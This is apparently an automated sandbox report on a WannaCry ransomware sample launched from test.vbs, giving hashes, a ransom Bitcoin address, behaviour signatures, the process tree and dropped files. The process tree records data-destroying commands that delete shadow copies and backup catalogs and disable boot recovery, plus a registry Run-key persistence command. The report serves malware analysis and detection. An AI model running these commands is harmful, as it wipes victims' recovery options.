Analysis
-
max time kernel
146s -
max time network
133s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
14-07-2020 07:32
Static task
static1
Behavioral task
behavioral1
Sample
test.vbs
Resource
win7
Behavioral task
behavioral2
Sample
test.vbs
Resource
win10v200430
General
-
Target
test.vbs
-
Size
589B
-
MD5
94d9611bf2c6e0caa430b1b0b808da1e
-
SHA1
723de46bdda58dd345b0c0bfd8bdbc33ea1931ec
-
SHA256
8cf91cb3c0524feabe3b9502aa36ec58003e9e0db849901948cd335caf0e4f66
-
SHA512
6baddf54c364c1c39bccd4f3e78f2b97f62297382c46642f6fc921fb2bc950e3ee44c6f94b5447c13faa028d9bc706ee9784582188e7a07fd3805de836b63e8e
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\@Please_Read_Me@.txt
wannacry
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
Signatures
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Executes dropped EXE 17 IoCs
Processes:
important.exetaskdl.exe@WanaDecryptor@.exe@WanaDecryptor@.exetaskhsvc.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskse.exe@WanaDecryptor@.exetaskdl.exepid process 640 important.exe 2088 taskdl.exe 1148 @WanaDecryptor@.exe 1732 @WanaDecryptor@.exe 2132 taskhsvc.exe 3668 taskse.exe 3556 @WanaDecryptor@.exe 1448 taskdl.exe 3608 taskdl.exe 3940 taskse.exe 1820 @WanaDecryptor@.exe 2088 taskdl.exe 3812 taskse.exe 3516 @WanaDecryptor@.exe 1668 taskse.exe 3088 @WanaDecryptor@.exe 816 taskdl.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 4020 vssadmin.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Drops startup file 2 IoCs
Processes:
important.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDC2BF.tmp important.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDC2C6.tmp important.exe -
Suspicious use of WriteProcessMemory 81 IoCs
Processes:
WScript.exeimportant.execmd.execmd.exe@WanaDecryptor@.execmd.exe@WanaDecryptor@.execmd.exedescription pid process target process PID 3544 wrote to memory of 640 3544 WScript.exe important.exe PID 3544 wrote to memory of 640 3544 WScript.exe important.exe PID 3544 wrote to memory of 640 3544 WScript.exe important.exe PID 640 wrote to memory of 864 640 important.exe attrib.exe PID 640 wrote to memory of 864 640 important.exe attrib.exe PID 640 wrote to memory of 864 640 important.exe attrib.exe PID 640 wrote to memory of 916 640 important.exe icacls.exe PID 640 wrote to memory of 916 640 important.exe icacls.exe PID 640 wrote to memory of 916 640 important.exe icacls.exe PID 640 wrote to memory of 2088 640 important.exe taskdl.exe PID 640 wrote to memory of 2088 640 important.exe taskdl.exe PID 640 wrote to memory of 2088 640 important.exe taskdl.exe PID 640 wrote to memory of 2448 640 important.exe cmd.exe PID 640 wrote to memory of 2448 640 important.exe cmd.exe PID 640 wrote to memory of 2448 640 important.exe cmd.exe PID 2448 wrote to memory of 2596 2448 cmd.exe cscript.exe PID 2448 wrote to memory of 2596 2448 cmd.exe cscript.exe PID 2448 wrote to memory of 2596 2448 cmd.exe cscript.exe PID 640 wrote to memory of 1148 640 important.exe @WanaDecryptor@.exe PID 640 wrote to memory of 1148 640 important.exe @WanaDecryptor@.exe PID 640 wrote to memory of 1148 640 important.exe @WanaDecryptor@.exe PID 640 wrote to memory of 1204 640 important.exe cmd.exe PID 640 wrote to memory of 1204 640 important.exe cmd.exe PID 640 wrote to memory of 1204 640 important.exe cmd.exe PID 1204 wrote to memory of 1732 1204 cmd.exe @WanaDecryptor@.exe PID 1204 wrote to memory of 1732 1204 cmd.exe @WanaDecryptor@.exe PID 1204 wrote to memory of 1732 1204 cmd.exe @WanaDecryptor@.exe PID 1148 wrote to memory of 2132 1148 @WanaDecryptor@.exe taskhsvc.exe PID 1148 wrote to memory of 2132 1148 @WanaDecryptor@.exe taskhsvc.exe PID 1148 wrote to memory of 2132 1148 @WanaDecryptor@.exe taskhsvc.exe PID 640 wrote to memory of 3668 640 important.exe taskse.exe PID 640 wrote to memory of 3668 640 important.exe taskse.exe PID 640 wrote to memory of 3668 640 important.exe taskse.exe PID 640 wrote to memory of 3556 640 important.exe @WanaDecryptor@.exe PID 640 wrote to memory of 3556 640 important.exe @WanaDecryptor@.exe PID 640 wrote to memory of 3556 640 important.exe @WanaDecryptor@.exe PID 640 wrote to memory of 1448 640 important.exe taskdl.exe PID 640 wrote to memory of 1448 640 important.exe taskdl.exe PID 640 wrote to memory of 1448 640 important.exe taskdl.exe PID 640 wrote to memory of 3060 640 important.exe cmd.exe PID 640 wrote to memory of 3060 640 important.exe cmd.exe PID 640 wrote to memory of 3060 640 important.exe cmd.exe PID 3060 wrote to memory of 1740 3060 cmd.exe reg.exe PID 3060 wrote to memory of 1740 3060 cmd.exe reg.exe PID 3060 wrote to memory of 1740 3060 cmd.exe reg.exe PID 1732 wrote to memory of 1036 1732 @WanaDecryptor@.exe cmd.exe PID 1732 wrote to memory of 1036 1732 @WanaDecryptor@.exe cmd.exe PID 1732 wrote to memory of 1036 1732 @WanaDecryptor@.exe cmd.exe PID 1036 wrote to memory of 4020 1036 cmd.exe vssadmin.exe PID 1036 wrote to memory of 4020 1036 cmd.exe vssadmin.exe PID 1036 wrote to memory of 4020 1036 cmd.exe vssadmin.exe PID 1036 wrote to memory of 3888 1036 cmd.exe WMIC.exe PID 1036 wrote to memory of 3888 1036 cmd.exe WMIC.exe PID 1036 wrote to memory of 3888 1036 cmd.exe WMIC.exe PID 640 wrote to memory of 3608 640 important.exe taskdl.exe PID 640 wrote to memory of 3608 640 important.exe taskdl.exe PID 640 wrote to memory of 3608 640 important.exe taskdl.exe PID 640 wrote to memory of 3940 640 important.exe taskse.exe PID 640 wrote to memory of 3940 640 important.exe taskse.exe PID 640 wrote to memory of 3940 640 important.exe taskse.exe PID 640 wrote to memory of 1820 640 important.exe @WanaDecryptor@.exe PID 640 wrote to memory of 1820 640 important.exe @WanaDecryptor@.exe PID 640 wrote to memory of 1820 640 important.exe @WanaDecryptor@.exe PID 640 wrote to memory of 2088 640 important.exe taskdl.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exepid process 1148 @WanaDecryptor@.exe 1732 @WanaDecryptor@.exe 1148 @WanaDecryptor@.exe 1732 @WanaDecryptor@.exe 3556 @WanaDecryptor@.exe 3556 @WanaDecryptor@.exe 1820 @WanaDecryptor@.exe 3516 @WanaDecryptor@.exe 3088 @WanaDecryptor@.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Views/modifies file attributes 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Modifies registry key 1 TTPs 1 IoCs
-
Adds Run entry to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\biiywaghgcpcp303 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\"" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe -
Loads dropped DLL 8 IoCs
Processes:
taskhsvc.exepid process 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
taskhsvc.exepid process 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
Processes:
taskse.exevssvc.exeWMIC.exetaskse.exetaskse.exetaskse.exedescription pid process Token: SeTcbPrivilege 3668 taskse.exe Token: SeTcbPrivilege 3668 taskse.exe Token: SeBackupPrivilege 2768 vssvc.exe Token: SeRestorePrivilege 2768 vssvc.exe Token: SeAuditPrivilege 2768 vssvc.exe Token: SeIncreaseQuotaPrivilege 3888 WMIC.exe Token: SeSecurityPrivilege 3888 WMIC.exe Token: SeTakeOwnershipPrivilege 3888 WMIC.exe Token: SeLoadDriverPrivilege 3888 WMIC.exe Token: SeSystemProfilePrivilege 3888 WMIC.exe Token: SeSystemtimePrivilege 3888 WMIC.exe Token: SeProfSingleProcessPrivilege 3888 WMIC.exe Token: SeIncBasePriorityPrivilege 3888 WMIC.exe Token: SeCreatePagefilePrivilege 3888 WMIC.exe Token: SeBackupPrivilege 3888 WMIC.exe Token: SeRestorePrivilege 3888 WMIC.exe Token: SeShutdownPrivilege 3888 WMIC.exe Token: SeDebugPrivilege 3888 WMIC.exe Token: SeSystemEnvironmentPrivilege 3888 WMIC.exe Token: SeRemoteShutdownPrivilege 3888 WMIC.exe Token: SeUndockPrivilege 3888 WMIC.exe Token: SeManageVolumePrivilege 3888 WMIC.exe Token: 33 3888 WMIC.exe Token: 34 3888 WMIC.exe Token: 35 3888 WMIC.exe Token: 36 3888 WMIC.exe Token: SeIncreaseQuotaPrivilege 3888 WMIC.exe Token: SeSecurityPrivilege 3888 WMIC.exe Token: SeTakeOwnershipPrivilege 3888 WMIC.exe Token: SeLoadDriverPrivilege 3888 WMIC.exe Token: SeSystemProfilePrivilege 3888 WMIC.exe Token: SeSystemtimePrivilege 3888 WMIC.exe Token: SeProfSingleProcessPrivilege 3888 WMIC.exe Token: SeIncBasePriorityPrivilege 3888 WMIC.exe Token: SeCreatePagefilePrivilege 3888 WMIC.exe Token: SeBackupPrivilege 3888 WMIC.exe Token: SeRestorePrivilege 3888 WMIC.exe Token: SeShutdownPrivilege 3888 WMIC.exe Token: SeDebugPrivilege 3888 WMIC.exe Token: SeSystemEnvironmentPrivilege 3888 WMIC.exe Token: SeRemoteShutdownPrivilege 3888 WMIC.exe Token: SeUndockPrivilege 3888 WMIC.exe Token: SeManageVolumePrivilege 3888 WMIC.exe Token: 33 3888 WMIC.exe Token: 34 3888 WMIC.exe Token: 35 3888 WMIC.exe Token: 36 3888 WMIC.exe Token: SeTcbPrivilege 3940 taskse.exe Token: SeTcbPrivilege 3940 taskse.exe Token: SeTcbPrivilege 3812 taskse.exe Token: SeTcbPrivilege 3812 taskse.exe Token: SeTcbPrivilege 1668 taskse.exe Token: SeTcbPrivilege 1668 taskse.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
@WanaDecryptor@.exeimportant.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" @WanaDecryptor@.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" important.exe -
Wannacry
WannaCry is a ransomware cryptoworm.
-
Blacklisted process makes network request 1 IoCs
Processes:
WScript.exeflow pid process 2 3544 WScript.exe -
Deletes itself 1 IoCs
Processes:
WScript.exepid process 3544 WScript.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.vbs"1⤵
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Deletes itself
-
C:\Users\Admin\AppData\Local\Temp\important.exe"C:\Users\Admin\AppData\Local\Temp\important.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
- Sets desktop wallpaper using registry
-
C:\Windows\SysWOW64\attrib.exeattrib +h .3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 230491594719096.bat3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs4⤵
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe co3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /b @WanaDecryptor@.exe vs3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe vs4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Sets desktop wallpaper using registry
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "biiywaghgcpcp303" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "biiywaghgcpcp303" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f4⤵
- Modifies registry key
- Adds Run entry to start application
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\0.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\00000000.res
-
C:\Users\Admin\AppData\Local\Temp\1.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\10.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\11.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\12.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\13.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\14.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\15.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\16.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\17.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\18.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\19.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\2.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\20.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\21.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\22.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\23.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\230491594719096.bat
-
C:\Users\Admin\AppData\Local\Temp\24.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\25.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\26.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\27.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\28.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\29.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\3.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\30.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\31.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\32.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\33.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\34.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\35.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\4.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\5.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\6.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\7.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\8.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\9.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe.lnk
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\LIBEAY32.dll
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\SSLEAY32.dll
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libssp-0.dll
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\zlib1.dll
-
C:\Users\Admin\AppData\Local\Temp\b.wnry
-
C:\Users\Admin\AppData\Local\Temp\c.wnry
-
C:\Users\Admin\AppData\Local\Temp\c.wnry
-
C:\Users\Admin\AppData\Local\Temp\important.exe
-
C:\Users\Admin\AppData\Local\Temp\important.exe
-
C:\Users\Admin\AppData\Local\Temp\m.vbs
-
C:\Users\Admin\AppData\Local\Temp\msg\m_bulgarian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (simplified).wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (traditional).wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_croatian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_czech.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_danish.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_dutch.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_english.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_filipino.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_finnish.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_french.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_german.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_greek.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_indonesian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_italian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_japanese.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_korean.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_latvian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_norwegian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_polish.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_portuguese.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_romanian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_russian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_slovak.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_spanish.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_swedish.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_turkish.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_vietnamese.wnry
-
C:\Users\Admin\AppData\Local\Temp\r.wnry
-
C:\Users\Admin\AppData\Local\Temp\s.wnry
-
C:\Users\Admin\AppData\Local\Temp\t.wnry
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe
-
C:\Users\Admin\AppData\Local\Temp\u.wnry
-
C:\Users\Admin\Desktop\@WanaDecryptor@.bmp
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libeay32.dll
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libeay32.dll
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libssp-0.dll
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\ssleay32.dll
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\zlib1.dll
-
memory/640-46-0x0000000010000000-0x0000000010010000-memory.dmpFilesize
64KB
-
memory/640-4-0x0000000000000000-mapping.dmp
-
memory/816-650-0x0000000000000000-mapping.dmp
-
memory/864-7-0x0000000000000000-mapping.dmp
-
memory/916-8-0x0000000000000000-mapping.dmp
-
memory/1036-595-0x0000000000000000-mapping.dmp
-
memory/1148-55-0x0000000000000000-mapping.dmp
-
memory/1204-56-0x0000000000000000-mapping.dmp
-
memory/1448-578-0x0000000000000000-mapping.dmp
-
memory/1668-646-0x0000000000000000-mapping.dmp
-
memory/1732-59-0x0000000000000000-mapping.dmp
-
memory/1732-58-0x0000000000000000-mapping.dmp
-
memory/1740-594-0x0000000000000000-mapping.dmp
-
memory/1820-601-0x0000000000000000-mapping.dmp
-
memory/2088-604-0x0000000000000000-mapping.dmp
-
memory/2088-47-0x0000000000000000-mapping.dmp
-
memory/2132-407-0x0000000003160000-0x0000000003161000-memory.dmpFilesize
4KB
-
memory/2132-527-0x0000000003770000-0x0000000003771000-memory.dmpFilesize
4KB
-
memory/2132-410-0x0000000003F70000-0x0000000003F71000-memory.dmpFilesize
4KB
-
memory/2132-579-0x0000000003770000-0x0000000003771000-memory.dmpFilesize
4KB
-
memory/2132-411-0x0000000003770000-0x0000000003771000-memory.dmpFilesize
4KB
-
memory/2132-62-0x0000000000000000-mapping.dmp
-
memory/2132-243-0x0000000003160000-0x0000000003161000-memory.dmpFilesize
4KB
-
memory/2132-79-0x0000000003160000-0x0000000003161000-memory.dmpFilesize
4KB
-
memory/2132-244-0x0000000003960000-0x0000000003961000-memory.dmpFilesize
4KB
-
memory/2132-80-0x0000000003960000-0x0000000003961000-memory.dmpFilesize
4KB
-
memory/2132-245-0x0000000003160000-0x0000000003161000-memory.dmpFilesize
4KB
-
memory/2132-316-0x0000000003160000-0x0000000003161000-memory.dmpFilesize
4KB
-
memory/2132-81-0x0000000003160000-0x0000000003161000-memory.dmpFilesize
4KB
-
memory/2132-409-0x0000000003770000-0x0000000003771000-memory.dmpFilesize
4KB
-
memory/2448-49-0x0000000000000000-mapping.dmp
-
memory/2596-51-0x0000000000000000-mapping.dmp
-
memory/3060-580-0x0000000000000000-mapping.dmp
-
memory/3088-648-0x0000000000000000-mapping.dmp
-
memory/3516-626-0x0000000000000000-mapping.dmp
-
memory/3556-575-0x0000000000000000-mapping.dmp
-
memory/3608-598-0x0000000000000000-mapping.dmp
-
memory/3668-574-0x0000000000000000-mapping.dmp
-
memory/3812-612-0x0000000000000000-mapping.dmp
-
memory/3888-597-0x0000000000000000-mapping.dmp
-
memory/3940-600-0x0000000000000000-mapping.dmp
-
memory/4020-596-0x0000000000000000-mapping.dmp